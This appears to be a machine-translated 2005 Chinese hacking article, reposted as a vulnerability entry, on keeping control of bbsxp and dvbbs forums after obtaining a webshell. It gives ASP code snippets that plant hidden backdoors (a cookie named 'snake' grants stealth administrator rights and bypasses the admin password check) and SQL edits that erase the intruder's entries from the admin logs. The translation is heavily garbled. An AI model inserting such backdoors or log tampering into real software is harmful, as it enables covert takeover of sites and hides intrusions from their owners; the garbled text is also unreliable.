Using the Webshell to get a individual who can't see the BBS administrators-vulnerability warning-the black bar safety net

2005-10-05T00:00:00
ID MYHACK58:6220053588
Type myhack58
Reporter 佚名
Modified 2005-10-05T00:00:00

Description

Author: Snakehu & Senarie source: evil octal The article has been published in 2 0 0 5-1 0 issue of hacker line of Defense of Objectives: by the Webshell for the original file to modify to make yourself into an administrator, a conventional case will not be the administrator found. Purpose: easy for everyone, in fact, know a little asp will, but their own test, the time charges are more. Get a webshell in the case of how to control theforum? This question seems a bit redundant. Are generally from theforumto get webshell, how will appear this situation? Now theforumto do more and more secure, in a new vulnerability found before, the latest version of theforumis generally very difficult to overcome. But a site there is always a weakness in the Rookie of the ring in the fire of the injection, upload vulnerability, and marginal notes, etc. all can make we get the Webshell for. Many people will ask, webshell was also afraid of theforumto get down to? To change the data on it. But this problem comes up, the admin okay and suddenly find more than one administrator account, you say how did he think? Maybe a big check. (Maybe put our webshell also Ferret out. Since we have a webshell, then why not in theforumto do tricks for? 1. bbsxp is. Version:even to 5. 1 Description (1)become the front Desk the Master The new include. asp,which reads as follows:

the < % if Request. Cookies("username")="snake" then membercode=5 end if % > the

In the setup. asp the tail add the following code:

the<! -- #include file="include. asp" --〉

Be sure to be in the tail, if you add in the head,then membercode will be reduced to the original value. This way,you can become a"stealth"administrator. (2). Become the the background Master In the admin. asp see sub(pass)here(5 line 3: The

session("pass")=md5(""&Request("pass")&"") if adminpassword < in > the session("pass") then error2("community management password incorrect")

This is the background of Password Authentication, we change to:

if Request. Cookies("username")〈〉"snake" then session("pass")=md5(""&Request("pass")&"") if adminpassword < in > the session("pass") then error2("community management password incorrect") end if

Summary look,if you have webshell,then don't read database,open the file,put you are not satisfied with password authentication are combined with the IF statement. Good control of the condition,wait until you after landing,these verification just...... Plus This paragraph: If Request. Cookies(“username”)=”snake” then Session(“pass”)= adminpassword End if

How about into the background casually enter a password. OK! Get in. Although the others from the normal channels can not see you are the master. But don't forget bbsxp of the log,since we have a webshell,that is also a bad change? In the admin. asp 1 6 line 4 You can see such a sentence: conn. execute("delete from [log] where logtime < the"&amp; SqlNowString&"-7") This is what the log is only saved for 7 days the reason. We subsequently also to the sentence: conn. execute("delete from [log] where ’username’=’snake’") So,every time someone landing in the background,our operation is Over off. 2. dvbbs. Version:to 7. 0 ac description of the dish at the pole, the hands of the chicken are no 7. 1, hi! God!) (1):to become a front Desk Master Hole networkForumeveryone should be very familiar with it. It is the authority to judge is placed in the/inc/Dv_ClsMain. asp complete. Give the front Desk administrator is of course to be here from the start. Hole network identity is the UserGroupID, 1 corresponds to the is administrator. So everyone in the Dv_ClsMain. asp search UserGroupID, and all the way to the 6 1 4-6 2 row 3:

Select Case UserGroupID Case 8 Vipuser = True Case 3 Boardmaster = True Case 2 Superboardmaster = True Case 1 Master = True End Select

This is the identity of the judge of the place. Let us before, plus the following:

if Request. Cookies(Forum_sn)("username")="snake" then UserGroupID=1 end if

(2): to become the back office Master Background the landing of the validation is placed in the admin_index. asp. See chklogin()3 1 9-3 4 2 line, we follow the way of the following modifications:

’======================== By Snakehu if username 〈〉 "snake" then ’======================== By Snakehu set rs=Dvbbs. Execute("select * from "&admintable&" where username=’"&username&"’ and adduser=’"&dvbbs. membername&"’") if rs. eof and rs. bof then rs. close set rs=nothing Response. Redirect "showerr. asp? action=OtherErr&ErrCodes=〈li〉you enter the username and password is incorrect or you are not a system administrator. Please < a href=admin_login. asp is > re-enter < /a > Your password. < b > after the return, please refresh the login page to re-enter the correct information. the < /b>" exit sub else if trim(rs("password"))〈〉password then Response. Redirect "showerr. asp? action=OtherErr&ErrCodes=〈li〉you enter the username and password is incorrect or you are not a system administrator. Please < a href=admin_login. asp is > re-enter < /a > Your password. < b > after the return, please refresh the login page to re-enter the correct information. the < /b>" exit sub else session("flag")=rs("flag") session. timeout=4 5 Dvbbs. Execute("update "&admintable&" set LastLogin="&amp; SqlNowString&",LastLoginIP=’"&ip&"’ where username=’"&username&"’") rs. close set rs=nothing response. redirect "admin_index. asp" end if end if ’======================== By Snakehu else session("flag")="1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36" session. timeout=4 5 response. redirect "admin_index. asp" end if ’======================== By Snakehu end sub

Explain that the session(“flag’)is used to determine the permissions, each number corresponding to the background of a layout, if it contains the corresponding layout of the flag it; otherwise, pop up an error page. Because the Diamondback I have not installed the 7. 1 broiler, it had to use 7. 0ac experiments. 7.1 method I think that is about it. But I remember 7. 1 admin_login. the asp part of the code is not the same, you may want to trouble everyone their change. Well, now from the front Desk to enter the“management”, enter the username of the snake, the password of any. Wow, finally got in, lovely backend! For dvbbs of the log, treat the method and bbsxp almost. Not much to say. It is not, you put admin_log. asp 2 2 3 row (""D"",l_addtime, "&amp; SqlNowString&") 〉 2 The 2 renamed 0 You can. The idea here is for the delete operation when within 2 days of the log is not deleted, we changed to 0 on all delete. Well, just like that. If there is something wrong place,Trouble you in theforumtell me yo. Coupling the first write.